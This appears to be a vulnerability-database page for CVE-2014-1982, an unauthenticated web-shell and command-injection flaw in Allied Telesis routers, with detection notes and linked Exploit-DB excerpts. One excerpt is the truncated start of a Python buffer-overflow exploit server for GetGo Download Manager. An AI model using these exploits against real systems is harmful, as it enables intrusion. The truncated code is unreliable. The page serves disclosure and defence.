CVE-2014-1982
published 2014-03-31CVE-2014-1982: The administrative interface in Allied Telesis AT-RG634A ADSL Broadband router 3.3+, iMG624A firmware 3.5, iMG616LH firmware 2.4, and iMG646BD firmware 3.5…
PriorityP268critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
9.83%
95.0th percentile
The administrative interface in Allied Telesis AT-RG634A ADSL Broadband router 3.3+, iMG624A firmware 3.5, iMG616LH firmware 2.4, and iMG646BD firmware 3.5 allows remote attackers to gain privileges and execute arbitrary commands via a direct request to cli.html.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alliedtelesis | at-rg634a_firmware | — | — |
| alliedtelesis | img616lh_firmware | — | — |
| alliedtelesis | img624a_firmware | — | — |
| alliedtelesis | img646bd_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP server logs for unauthenticated GET/POST requests to /cli.html on Allied Telesis routers; any access to this path without prior authentication is indicative of exploitation. ↗
- →Detect direct requests to cli.html from external/untrusted sources; the vulnerability is exploitable remotely without authentication. ↗
- ·The vendor workaround restricts management access by IP allowlist; without this control, /cli.html is accessible to any host by default. ↗
- ·Firmware version 3.8.05 reportedly addresses the issue, but this was unconfirmed by the researcher at time of disclosure. ↗
- ·The AT-RG634A product is end-of-life and no longer supported by Allied Telesis, meaning no official patch will be issued for this device. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell
exploitdb·2014-03-26·CVSS 10.0
CVE-2014-1982 [CRITICAL] Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell
Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell
---
*Title:*
Allied Telesis AT-RG634A ADSL Broadband router hidden administrative
unauthenticated webshell.
*Vulnerability Information:*
- CVE: CVE-2014-1982
- Type of Vulnerability:
- CWE-78 : OS Command Injection
- CWE-306 : Missing Authentication for Critical Function
*Affected products:*
- Allied Telesis AT-RG634A ADSL Broadband router. (version 3.3+ and
probably others)
Other products like,
- Allied Telesis iMG624A (firmware version, 3.5)
- Allied Telesis iMG616LH (firmware version, +2.4)
- Allied Telesis iMG646BD (firmware version, 3.5)
*Vendor:*
- Allied Telesis : http://www.alliedtelesis.com//
has the same vulnerbility, but the vendor reports that the version
3.8.05 of the firmware has already addressed this issue
Exploit-DB
GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
exploitdb·2014-03-09·CVSS 10.0
CVE-2014-2206 [CRITICAL] GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection
No writeups or analysis indexed.
2014-03-31
Published